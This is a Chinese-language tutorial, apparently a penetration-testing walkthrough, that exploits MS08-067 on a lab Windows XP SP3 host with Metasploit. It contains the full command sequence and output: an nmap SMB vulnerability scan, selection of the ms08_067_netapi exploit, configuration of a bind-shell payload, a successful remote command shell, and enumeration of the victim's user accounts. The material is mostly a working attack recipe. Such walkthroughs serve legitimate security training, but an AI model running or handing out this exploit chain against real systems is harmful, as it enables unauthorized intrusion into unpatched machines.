被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English
攻击者IP地址:192.168.9.1
//查看数据库连接状态
msf > db_status
[*] postgresql connected to msf3
//使用nmap扫描目标机器
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-25 11:01
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: | MS08-067: VULNERABLE
[*] Nmap: | Conficker: Likely CLEAN
[*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results athttp://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
//查找ms08_067漏洞
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
//使用MS08_067漏洞
msf > use exploit/windows/smb/ms08_067_netapi
//设置远程地址,正向连接
msf exploit(ms08_067_netapi) > set RHOST 192.168.9.4
RHOST => 192.168.9.4
//设置ShellCode
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
//显示配置的选项
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.9.4 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST 192.168.9.4 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
//expliot
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800
成功返回Shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest hacker
HelpAssistant SUPPORT_388945a0
The command completed with one or more errors.
------------------------------------------------------------------------------------------------------------------------
如果想漏洞支持什么操作系统,可以输入info命令,就能看到关于漏洞的详细信息。